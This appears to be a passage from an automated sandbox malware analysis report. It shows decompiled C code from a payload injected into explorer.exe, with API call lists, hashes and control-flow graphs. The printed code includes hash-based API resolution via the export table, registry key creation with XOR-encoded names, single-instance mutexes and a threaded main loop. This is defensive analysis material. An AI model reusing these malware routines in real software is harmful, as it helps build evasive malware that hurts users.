                    • Part of subcall function 0008B946: GetCurrentThread.KERNEL32(00000008,00000000,10000000,00000000,?,?,0008BA7C,74EC17D9,10000000), ref: 0008B959
                    • Part of subcall function 0008B946: GetLastError.KERNEL32(?,?,0008BA7C,74EC17D9,10000000), ref: 0008B967
                    • Part of subcall function 0008B946: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,0008BA7C,74EC17D9,10000000), ref: 0008B980
                  • lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,00000000), ref: 0008B0D0
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Currentmemset$ErrorFolderLastPathProcessThreadlstrcpyn
                  • String ID:
                  • API String ID: 3158470084-0
                  • Opcode ID: 3309cad5030584fc54aa8f49d31479e0ce1f2041df6bd5106adfde4e1a117ce7
                  • Instruction ID: 19c7f563789c793ddff4382733eb78b8a69f152fd9c3ce08f6bae5569c2b2d08
                  • Opcode Fuzzy Hash: 3309cad5030584fc54aa8f49d31479e0ce1f2041df6bd5106adfde4e1a117ce7
                  • Instruction Fuzzy Hash: FA218EB2501218BFE710EBA4DCC9EDB77BCBB49354F1040A5F20AD7192EB749E458B60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 443 8bf37-8bf66 RegOpenKeyExW 444 8bf68-8bf6a 443->444 445 8bf6c-8bf8a RegQueryValueExW 443->445 446 8bfda-8bfdc 444->446 447 8bf8c-8bf9c call 88604 445->447 448 8bfc7-8bfca 445->448 447->448 454 8bf9e-8bfb8 RegQueryValueExW 447->454 449 8bfcc-8bfd1 448->449 450 8bfd7 448->450 449->450 452 8bfd9 450->452 452->446 455 8bfba-8bfc6 call 8861a 454->455 456 8bfdd-8bfea RegCloseKey 454->456 455->448 456->452
                  C-Code - Quality: 100%
                  			E0008BF37(short* __edx, short* _a4) {
                  				void* _v8;
                  				int _v12;
                  				int _v16;
                  				char* _v20;
                  				char* _t30;
                  				intOrPtr _t31;
                  				char* _t49;
                  
                  				_v16 = 0;
                  				_v12 = 0;
                  				_v8 = 0;
                  				if(RegOpenKeyExW(0x80000002, __edx, 0, 0x20019,  &_v8) == 0) {
                  					if(RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12) != 0) {
                  						L6:
                  						if(_v8 != 0) {
                  							_t31 =  *0x9e68c; // 0xe7fab8
                  							 *((intOrPtr*)(_t31 + 0x1c))(_v8);
                  						}
                  						_t30 = 0;
                  						L9:
                  						return _t30;
                  					}
                  					_t49 = E00088604(_v12);
                  					_v20 = _t49;
                  					if(_t49 == 0) {
                  						goto L6;
                  					}
                  					if(RegQueryValueExW(_v8, _a4, 0, 0, _t49,  &_v12) == 0) {
                  						RegCloseKey(_v8);
                  						_t30 = _t49;
                  						goto L9;
                  					}
                  					E0008861A( &_v20, 0xfffffffe);
                  					goto L6;
                  				}
                  				return 0;
                  			}











                  APIs
                  • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,00000000,00000000,?,?,00082C08,00000000), ref: 0008BF5E
                  • RegQueryValueExW.KERNEL32(00000000,00082C08,00000000,?,00000000,00082C08,00000000,?,?,00082C08,00000000), ref: 0008BF82
                  • RegQueryValueExW.KERNEL32(00000000,00082C08,00000000,00000000,00000000,00082C08,?,?,00082C08,00000000), ref: 0008BFB0
                  • RegCloseKey.KERNEL32(00000000,?,?,00082C08,00000000,?,?,?,?,?,?,?,000000AF,?), ref: 0008BFE5
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: QueryValue$CloseOpen
                  • String ID:
                  • API String ID: 1586453840-0
                  • Opcode ID: eb045fb9aa9dc7280153c8fb7aa9239c4f3b61ea42fdf97ace11c877361682ae
                  • Instruction ID: 30ccd786ff8b7b84f14da17d4d39020c4d4bce544ae74224a6a2efcb0f455484
                  • Opcode Fuzzy Hash: eb045fb9aa9dc7280153c8fb7aa9239c4f3b61ea42fdf97ace11c877361682ae
                  • Instruction Fuzzy Hash: 3121E8B6900118FFDB50EBA9DC48E9EBBF8FF88750B1541AAF645E6162D7309A00DB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 459 8be9b-8bec3 RegOpenKeyExA 460 8bec9-8bee6 RegQueryValueExA 459->460 461 8bec5-8bec7 459->461 463 8bee8-8bef7 call 88604 460->463 464 8bf21-8bf24 460->464 462 8bf33-8bf36 461->462 463->464 469 8bef9-8bf13 RegQueryValueExA 463->469 466 8bf31 464->466 467 8bf26-8bf2e RegCloseKey 464->467 466->462 467->466 469->464 470 8bf15-8bf1a 469->470 470->464 471 8bf1c-8bf1f 470->471 471->464
                  C-Code - Quality: 100%
                  			E0008BE9B(void* __ecx, char* __edx, char* _a4, intOrPtr* _a12) {
                  				void* _v8;
                  				int _v12;
                  				int _v16;
                  				intOrPtr* _t43;
                  				char* _t46;
                  
                  				_t46 = 0;
                  				_v8 = 0;
                  				_v16 = 0;
                  				if(RegOpenKeyExA(__ecx, __edx, 0, 0x20019,  &_v8) != 0) {
                  					return 0;
                  				}
                  				_v12 = 0;
                  				if(RegQueryValueExA(_v8, _a4, 0,  &_v16, 0,  &_v12) == 0) {
                  					_t46 = E00088604(_v12 + 1);
                  					if(_t46 != 0 && RegQueryValueExA(_v8, _a4, 0,  &_v16, _t46,  &_v12) == 0) {
                  						_t43 = _a12;
                  						if(_t43 != 0) {
                  							 *_t43 = _v12;
                  						}
                  					}
                  				}
                  				if(_v8 != 0) {
                  					RegCloseKey(_v8);
                  				}
                  				return _t46;
                  			}









                  APIs
                  • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,00E7FC18,00000000,?,00000002), ref: 0008BEBE
                  • RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 0008BEE1
                  • RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 0008BF0E
                  • RegCloseKey.KERNEL32(?,?,00000002), ref: 0008BF2E
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: QueryValue$CloseOpen
                  • String ID:
                  • API String ID: 1586453840-0
                  • Opcode ID: ddc077ba024ef068cbd919a8e6084d299da2af67421786a4409f78ee1ec57403
                  • Instruction ID: a503bc69bf056dc60d578d60e72969ac8cbe77b2aa393cc8f9a4dd6054926014
                  • Opcode Fuzzy Hash: ddc077ba024ef068cbd919a8e6084d299da2af67421786a4409f78ee1ec57403
                  • Instruction Fuzzy Hash: 0921A4B5A00148BF9B61DFA9DC44DAEBBF8FF98740B1141A9B945E7211D7309E00DB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 78%
                  			E00085631(void* __edx, void* __edi) {
                  				char _v44;
                  				void* _t8;
                  				intOrPtr _t11;
                  				intOrPtr _t14;
                  				intOrPtr _t17;
                  				intOrPtr _t18;
                  				void* _t20;
                  				void* _t33;
                  				void* _t34;
                  				void* _t36;
                  				void* _t39;
                  				void* _t40;
                  				void* _t49;
                  				void* _t54;
                  
                  				_t54 = __edi;
                  				_t8 = E00089E66(0x3b); // executed
                  				if(_t8 != 0xffffffff) {
                  					L2:
                  					E0008980C(0x9e6c8);
                  					_t39 = 0x37; // executed
                  					E00089F06(_t39);
                  					_t11 =  *0x9e688; // 0xb0000
                  					_t40 = 0x3a; // executed
                  					E00089F06(_t40); // executed
                  					E0008E4C1(_t63);
                  					_t14 =  *0x9e688; // 0xb0000
                  					_t41 =  &_v44;
                  					_t52 =  *((intOrPtr*)(_t14 + 0xac)) + 2;
                  					E0008A86D( &_v44,  *((intOrPtr*)(_t14 + 0xac)) + 2, _t63);
                  					_t17 =  *0x9e684; // 0xe7f8f0
                  					_t18 =  *((intOrPtr*)(_t17 + 0xc4))(0, 0, 0,  &_v44,  *((intOrPtr*)(_t11 + 0x1640)), 0,  *0x9e6c8,  *0x9e6cc);
                  					 *0x9e74c = _t18;
                  					if(_t18 != 0) {
                  						_t20 = CreateMutexA(0, 0, 0);
                  						 *0x9e76c = _t20;
                  						__eflags = _t20;
                  						if(_t20 != 0) {
                  							_t34 = E00088604(0x1000);
                  							_t52 = 0;
                  							 *0x9e770 = _t34;
                  							_t49 =  *0x9e774; // 0x2
                  							__eflags = _t34;
                  							_t41 =  !=  ? 0 : _t49;
                  							__eflags = _t41;
                  							 *0x9e774 = _t41; // executed
                  						}
                  						E0008153B(_t41, _t52); // executed
                  						E000898EE(E00082EDA, 0, __eflags, 0, 0); // executed
                  						E00083017(); // executed
                  						E000831C2(0, __eflags); // executed
                  						E000829B1(); // executed
                  						E00083BB2(_t54, __eflags); // executed
                  						while(1) {
                  							__eflags =  *0x9e758; // 0x0
                  							if(__eflags != 0) {
                  								break;
                  							}
                  							E0008980C(0x9e750);
                  							_push(0x9e750);
                  							_push(0x9e750); // executed
                  							E0008279B();
                  							Sleep(0xfa0);
                  						}
                  						E00083D34();
                  						E00089A8E();
                  						E000834CB();
                  						_t33 = 0;
                  						__eflags = 0;
                  					} else {
                  						goto L3;
                  					}
                  				} else {
                  					_t36 = E00082DCB();
                  					_t63 = _t36;
                  					if(_t36 != 0) {
                  						L3:
                  						_t33 = 1;
                  					} else {
                  						goto L2;
                  					}
                  				}
                  				return _t33;
                  			}


















                  APIs
                  • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 000856D0
                    • Part of subcall function 0008980C: GetSystemTimeAsFileTime.KERNEL32(?,?,00085FAF), ref: 00089819
                    • Part of subcall function 0008980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00089839
                  • Sleep.KERNELBASE(00000FA0), ref: 0008574A
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Time$CreateFileMutexSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                  • String ID: mNa
                  • API String ID: 3249252070-3942756900
                  • Opcode ID: fd4bb5a668434b88d5c04a99dfde256102c0f641a73eee2e9a85173188a96518
                  • Instruction ID: 618d9e32d6944c2961c1c58ef027407fe41e2fb87ac27e57644674ab890b217f
                  • Opcode Fuzzy Hash: fd4bb5a668434b88d5c04a99dfde256102c0f641a73eee2e9a85173188a96518
                  • Instruction Fuzzy Hash: 0031D6312056509BF724FBB5EC069EA3B99FF557A0B144126F5C9861A3EE349900C763
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 522 8dfad-8dfc4 523 8e021 522->523 524 8dfc6-8dfee 522->524 526 8e023-8e027 523->526 524->523 525 8dff0-8e013 call 8c379 call 8d400 524->525 531 8e028-8e03f 525->531 532 8e015-8e01f 525->532 533 8e041-8e049 531->533 534 8e095-8e097 531->534 532->523 532->525 533->534 535 8e04b 533->535 534->526 536 8e04d-8e053 535->536 537 8e063-8e074 536->537 538 8e055-8e057 536->538 540 8e079-8e085 LoadLibraryA 537->540 541 8e076-8e077 537->541 538->537 539 8e059-8e061 538->539 539->536 539->537 540->523 542 8e087-8e091 GetProcAddress 540->542 541->540 542->523 543 8e093 542->543 543->526
                  C-Code - Quality: 100%
                  			E0008DFAD(void* __ecx, intOrPtr __edx) {
                  				signed int _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v20;
                  				intOrPtr _v24;
                  				intOrPtr _v28;
                  				char _v92;
                  				intOrPtr _t41;
                  				signed int _t47;
                  				signed int _t49;
                  				signed int _t51;
                  				void* _t56;
                  				struct HINSTANCE__* _t58;
                  				_Unknown_base(*)()* _t59;
                  				intOrPtr _t60;
                  				void* _t62;
                  				intOrPtr _t63;
                  				void* _t69;
                  				char _t70;
                  				void* _t75;
                  				CHAR* _t80;
                  				void* _t82;
                  
                  				_t75 = __ecx;
                  				_v12 = __edx;
                  				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
                  				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
                  				if(_t41 == 0) {
                  					L4:
                  					return 0;
                  				}
                  				_t62 = _t41 + __ecx;
                  				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
                  				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                  				_t63 =  *((intOrPtr*)(_t62 + 0x18));
                  				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
                  				_t47 = 0;
                  				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                  				_v8 = 0;
                  				_v16 = _t63;
                  				if(_t63 == 0) {
                  					goto L4;
                  				} else {
                  					goto L2;
                  				}
                  				while(1) {
                  					L2:
                  					_t49 = E0008D400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E0008C379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
                  					_t51 = _v8;
                  					if((_t49 ^ 0x218fe95b) == _v12) {
                  						break;
                  					}
                  					_t73 = _v20;
                  					_t47 = _t51 + 1;
                  					_v8 = _t47;
                  					if(_t47 < _v16) {
                  						continue;
                  					}
                  					goto L4;
                  				}
                  				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
                  				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
                  				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
                  					return _t80;
                  				} else {
                  					_t56 = 0;
                  					while(1) {
                  						_t70 = _t80[_t56];
                  						if(_t70 == 0x2e || _t70 == 0) {
                  							break;
                  						}
                  						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
                  						_t56 = _t56 + 1;
                  						if(_t56 < 0x40) {
                  							continue;
                  						}
                  						break;
                  					}
                  					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
                  					 *((char*)(_t82 + _t56 - 0x54)) = 0;
                  					if( *((char*)(_t56 + _t80)) != 0) {
                  						_t80 =  &(( &(_t80[1]))[_t56]);
                  					}
                  					_t40 =  &_v92; // 0x6c6c642e
                  					_t58 = LoadLibraryA(_t40); // executed
                  					if(_t58 == 0) {
                  						goto L4;
                  					}
                  					_t59 = GetProcAddress(_t58, _t80);
                  					if(_t59 == 0) {
                  						goto L4;
                  					}
                  					return _t59;
                  				}
                  			}


                  APIs
                  • LoadLibraryA.KERNEL32(.dll), ref: 0008E07D
                  • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 0008E089
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AddressLibraryLoadProc
                  • String ID: .dll
                  • API String ID: 2574300362-2738580789
                  • Opcode ID: 6b3667d21c83c631e7308aa9a773b73a335c260cf3743c54930195356ac01f65
                  • Instruction ID: 961bbec8ee8d513a9e7f355b8d92f0886381f3dfd6057b13809224bdd72c88db
                  • Opcode Fuzzy Hash: 6b3667d21c83c631e7308aa9a773b73a335c260cf3743c54930195356ac01f65
                  • Instruction Fuzzy Hash: 6F310631A001458BCB25EFADC884BAEBBF5BF44304F280869D981D7352DB70EC81CB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 89%
                  			E00089B43(char __ecx, int __edx, void* __fp0, int* _a4, int* _a8, int* _a12) {
                  				void* _v8;
                  				int _v12;
                  				void* _v16;
                  				void* _v20;
                  				int _v24;
                  				void* _v28;
                  				char _v32;
                  				char _v36;
                  				int* _v40;
                  				int** _v44;
                  				void _v108;
                  				int* _t90;
                  				void* _t91;
                  				char* _t92;
                  				long _t96;
                  				int* _t97;
                  				intOrPtr _t98;
                  				int* _t101;
                  				long _t111;
                  				int* _t112;
                  				intOrPtr _t122;
                  				char* _t125;
                  				intOrPtr _t126;
                  				intOrPtr _t128;
                  				int* _t129;
                  				intOrPtr _t131;
                  				int* _t133;
                  				intOrPtr _t134;
                  				int* _t135;
                  				intOrPtr _t136;
                  				char* _t139;
                  				int _t143;
                  				int _t147;
                  				intOrPtr _t148;
                  				int* _t149;
                  				int* _t154;
                  				int** _t155;
                  				int* _t161;
                  				int* _t163;
                  				intOrPtr _t164;
                  				intOrPtr _t171;
                  				int _t176;
                  				char* _t177;
                  				char* _t178;
                  				char _t179;
                  				void* _t180;
                  				void* _t181;
                  				void* _t183;
                  
                  				_t176 = 0;
                  				_v24 = __edx;
                  				_t177 = 0;
                  				_v32 = __ecx;
                  				_v28 = 0;
                  				_v8 = 0x80000001;
                  				_v20 = 0;
                  				_t155 = E00088604(0x110);
                  				_v44 = _t155;
                  				if(_t155 != 0) {
                  					_t158 = _a4;
                  					_t155[0x42] = _a4;
                  					E0008B5F6(_a4, __edx, __eflags, __fp0, _t158,  &_v108);
                  					_t161 = _v108;
                  					__eflags = _t161 - 0x61 - 0x19;
                  					_t90 = _t161;
                  					if(_t161 - 0x61 <= 0x19) {
                  						_t90 = _t90 - 0x20;
                  						__eflags = _t90;
                  					}
                  					_v108 = _t90;
                  					_t91 = E000895C7(0x4d2);
                  					_t163 = _v24;
                  					_v16 = _t91;
                  					__eflags = _t163;
                  					if(_t163 == 0) {
                  						L16:
                  						_t164 =  *0x9e688; // 0xb0000
                  						__eflags =  *((intOrPtr*)(_t164 + 0x214)) - 3;
                  						if( *((intOrPtr*)(_t164 + 0x214)) != 3) {
                  							_push(_t176);
                  							_push( &_v108);
                  							_push("\\");
                  							_t92 = E00089292(_t91);
                  							_t181 = _t181 + 0x10;
                  							L20:
                  							_t177 = _t92;
                  							_v20 = _t177;
                  							goto L21;
                  						}
                  						_v24 = _t176;
                  						_v8 = 0x80000003;
                  						_t122 =  *0x9e68c; // 0xe7fab8
                  						 *((intOrPtr*)(_t122 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x110)))),  &_v24);
                  						__eflags = _v24 - _t177;
                  						if(_v24 == _t177) {
                  							goto L21;
                  						}
                  						_push(_t176);
                  						_push( &_v108);
                  						_t125 = "\\";
                  						_push(_t125);
                  						_push(_v16);
                  						_push(_t125);
                  						_t92 = E00089292(_v24);
                  						_t181 = _t181 + 0x18;
                  						goto L20;
                  					} else {
                  						_t126 =  *0x9e688; // 0xb0000
                  						_t128 =  *0x9e68c; // 0xe7fab8
                  						_t129 =  *((intOrPtr*)(_t128 + 0x68))(_t163,  *((intOrPtr*)( *((intOrPtr*)(_t126 + 0x110)))));
                  						__eflags = _t129;
                  						if(_t129 != 0) {
                  							_t91 = _v16;
                  							goto L16;
                  						}
                  						_v12 = _t176;
                  						_t131 =  *0x9e68c; // 0xe7fab8
                  						_v8 = 0x80000003;
                  						 *((intOrPtr*)(_t131 + 0x20))(_v24,  &_v12);
                  						__eflags = _v12 - _t177;
                  						if(_v12 == _t177) {
                  							L21:
                  							E000885C2( &_v16);
                  							_t96 = RegOpenKeyExA(_v8, _t177, _t176, 0x20019,  &_v28);
                  							__eflags = _t96;
                  							if(_t96 == 0) {
                  								_t97 = _a8;
                  								__eflags = _t97;
                  								if(_t97 != 0) {
                  									 *_t97 = 1;
                  								}
                  								_push(_v28);
                  								L30:
                  								_t98 =  *0x9e68c; // 0xe7fab8
                  								 *((intOrPtr*)(_t98 + 0x1c))();
                  								_t155[0x43] = _v8;
                  								_t101 = E0008C379(_t177);
                  								 *_t155 = _t101;
                  								__eflags = _t101;
                  								if(_t101 == 0) {
                  									L32:
                  									E0008861A( &_v20, 0xffffffff);
                  									return _t155;
                  								} else {
                  									goto L31;
                  								}
                  								do {
                  									L31:
                  									 *(_t155 + _t176 + 4) =  *(_t180 + (_t176 & 0x00000003) + 8) ^ _t177[_t176];
                  									_t176 = _t176 + 1;
                  									__eflags = _t176 -  *_t155;
                  								} while (_t176 <  *_t155);
                  								goto L32;
                  							}
                  							_v16 = _t176;
                  							_t111 = RegCreateKeyA(_v8, _t177,  &_v16);
                  							__eflags = _t111;
                  							if(_t111 == 0) {
                  								_t112 = _a8;
                  								__eflags = _t112;
                  								if(_t112 != 0) {
                  									 *_t112 = _t176;
                  								}
                  								_push(_v16);
                  								goto L30;
                  							}
                  							L23:
                  							E0008861A( &_v44, 0x110);
                  							memset( &_v108, _t176, 0x40);
                  							E0008861A( &_v20, 0xffffffff);
                  							goto L1;
                  						}
                  						_push(_t176);
                  						_push(_v16);
                  						_t178 = "\\";
                  						_push(_t178);
                  						_t133 = E00089292(_v12);
                  						_t181 = _t181 + 0x10;
                  						_v40 = _t133;
                  						__eflags = _t133;
                  						if(_t133 == 0) {
                  							goto L23;
                  						}
                  						_t134 =  *0x9e68c; // 0xe7fab8
                  						_t135 =  *((intOrPtr*)(_t134 + 0x14))(_v8, _t133, _t176, 0x20019,  &_v36);
                  						__eflags = _t135;
                  						if(_t135 == 0) {
                  							_t136 =  *0x9e68c; // 0xe7fab8
                  							 *((intOrPtr*)(_t136 + 0x1c))(_v36);
                  						} else {
                  							_t143 = E000895E1( &_v36, 0x34);
                  							_v24 = _t143;
                  							_t179 = E000892E5(_v32);
                  							_v32 = _t179;
                  							E000885D5( &_v24);
                  							_t183 = _t181 + 0x18;
                  							_t147 = E00089256(_v12);
                  							_v24 = _t147;
                  							_t148 =  *0x9e68c; // 0xe7fab8
                  							_t149 =  *((intOrPtr*)(_t148 + 0x30))(_v8, _t147, _t179, "\\", _t143, _t176);
                  							__eflags = _t149;
                  							if(_t149 == 0) {
                  								_t154 = _a12;
                  								__eflags = _t154;
                  								if(_t154 != 0) {
                  									 *_t154 = 1;
                  								}
                  							}
                  							E0008861A( &_v32, 0xfffffffe);
                  							E0008861A( &_v24, 0xfffffffe);
                  							_t181 = _t183 + 0x10;
                  							_t178 = "\\";
                  						}
                  						_t139 = E00089292(_v12);
                  						_t171 =  *0x9e684; // 0xe7f8f0
                  						_t181 = _t181 + 0x18;
                  						_t177 = _t139;
                  						_v20 = _t177;
                  						 *((intOrPtr*)(_t171 + 0x34))(_v12, _t178, _v16, _t178,  &_v108, _t176);
                  						E0008861A( &_v40, 0xffffffff);
                  						goto L21;
                  					}
                  				}
                  				L1:
                  				return 0;
                  			}


                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: d3ee57014509ae2ff040b6b3c1fdc026683ba4ce783e510bd8cf0a7ce7d76e45
                  • Instruction ID: 48420b51e388212ba148de9a5a5aa9c152fd141e90dbe33b6e7652c92ab7c875
                  • Opcode Fuzzy Hash: d3ee57014509ae2ff040b6b3c1fdc026683ba4ce783e510bd8cf0a7ce7d76e45
                  • Instruction Fuzzy Hash: 139127B1900209AFDF10EFA9DD45DEEBBB8FF48310F144169F555AB262DB359A00CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 86%
                  			E0008B998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
                  				long _v8;
                  				void* _v12;
                  				void* _t12;
                  				void* _t20;
                  				void* _t22;
                  				union _TOKEN_INFORMATION_CLASS _t28;
                  				void* _t31;
                  
                  				_push(_t22);
                  				_push(_t22);
                  				_t31 = 0;
                  				_t28 = __edx;
                  				_t20 = _t22;
                  				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
                  					L6:
                  					_t12 = _t31;
                  				} else {
                  					_t31 = E00088604(_v8);
                  					_v12 = _t31;
                  					if(_t31 != 0) {
                  						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
                  							goto L6;
                  						} else {
                  							E0008861A( &_v12, _t16);
                  							goto L3;
                  						}
                  					} else {
                  						L3:
                  						_t12 = 0;
                  					}
                  				}
                  				return _t12;
                  			}


                  APIs
                  • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9B3
                  • GetLastError.KERNEL32(?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9BA
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9E9
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: InformationToken$AllocateErrorHeapLast
                  • String ID:
                  • API String ID: 2499131667-0
                  • Opcode ID: 30974beac8b2856b26893e7e6f2f40e01bd49064f9cad794b75fd758cf646baa
                  • Instruction ID: 50b00f07447128573cf446961854993498285b3da02e0cb9ad280b6d8ca9cbf5
                  • Opcode Fuzzy Hash: 30974beac8b2856b26893e7e6f2f40e01bd49064f9cad794b75fd758cf646baa
                  • Instruction Fuzzy Hash: 62016272600118BF9B64ABAADC49DAB7FECFF457A17110666F685D3211EB34DD0087A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0008590C(CHAR* __ecx, void* __edx, intOrPtr* _a4) {
                  				intOrPtr _t10;
                  				void* _t13;
                  				void* _t19;
                  				signed int _t21;
                  				signed int _t22;
                  
                  				_t13 = __edx;
                  				if(__ecx != 0) {
                  					_t22 = 0;
                  					_t19 = CreateMutexA(0, 1, __ecx);
                  					if(_t19 != 0) {
                  						if(GetLastError() != 0xb7 || E0008A4BF(_t19, _t13) != 0xffffffff) {
                  							_t22 = 1;
                  							 *_a4 = _t19;
                  						} else {
                  							_t10 =  *0x9e684; // 0xe7f8f0
                  							 *((intOrPtr*)(_t10 + 0x30))(_t19);
                  						}
                  					} else {
                  						GetLastError();
                  						_t22 = 0xffffffff;
                  					}
                  				} else {
                  					_t22 = _t21 | 0xffffffff;
                  				}
                  				return _t22;
                  			}


                  APIs
                  • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,?,000859CD,00085DD4,Global,0009BA18,?,00000000,?,00000002), ref: 00085928
                  • GetLastError.KERNEL32(?,?,000859CD,00085DD4,Global,0009BA18,?,00000000,?,00000002), ref: 00085934
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateErrorLastMutex
                  • String ID:
                  • API String ID: 1925916568-0
                  • Opcode ID: 1e9ba27d02d2df59a864ede134e86214b79921280e0dcb6860e8fc376ac35514
                  • Instruction ID: 1c4491eb415752db81424c57f385e659120548c2048b1677d1101b25907139c6
                  • Opcode Fuzzy Hash: 1e9ba27d02d2df59a864ede134e86214b79921280e0dcb6860e8fc376ac35514
                  • Instruction Fuzzy Hash: 3FF02831600910CBEA20276ADC4497E76D8FBE6772B510322F9E9D72D0DF748C0543A1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0008A471(CHAR* __ecx, void* __edx) {
                  				intOrPtr _t8;
                  				void* _t16;
                  				void* _t17;
                  
                  				_t16 = __edx; // executed
                  				_t17 = CreateMutexA(0, 1, __ecx);
                  				if(_t17 != 0) {
                  					if(GetLastError() == 0xb7 && E0008A4BF(_t17, _t16) < 0) {
                  						_t8 =  *0x9e684; // 0xe7f8f0
                  						 *((intOrPtr*)(_t8 + 0x30))(_t17);
                  						_t17 = 0;
                  					}
                  					return _t17;
                  				}
                  				GetLastError();
                  				return 0;
                  			}


                  APIs
                  • CreateMutexA.KERNELBASE(00000000,00000001,?,00000000,00000000,00084E14,00000000), ref: 0008A47F
                  • GetLastError.KERNEL32 ref: 0008A48B
                  • GetLastError.KERNEL32 ref: 0008A495
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: ErrorLast$CreateMutex
                  • String ID:
                  • API String ID: 200418032-0
                  • Opcode ID: d451146697d2d7be7ee239c6e2cf6256a97e20a24ce2cfbe4ac2cdb7fc53f4f3
                  • Instruction ID: e0de8723e9178c59a55691960d7167cf6849532d0ff7e7a54eb44961aa7457b0
                  • Opcode Fuzzy Hash: d451146697d2d7be7ee239c6e2cf6256a97e20a24ce2cfbe4ac2cdb7fc53f4f3
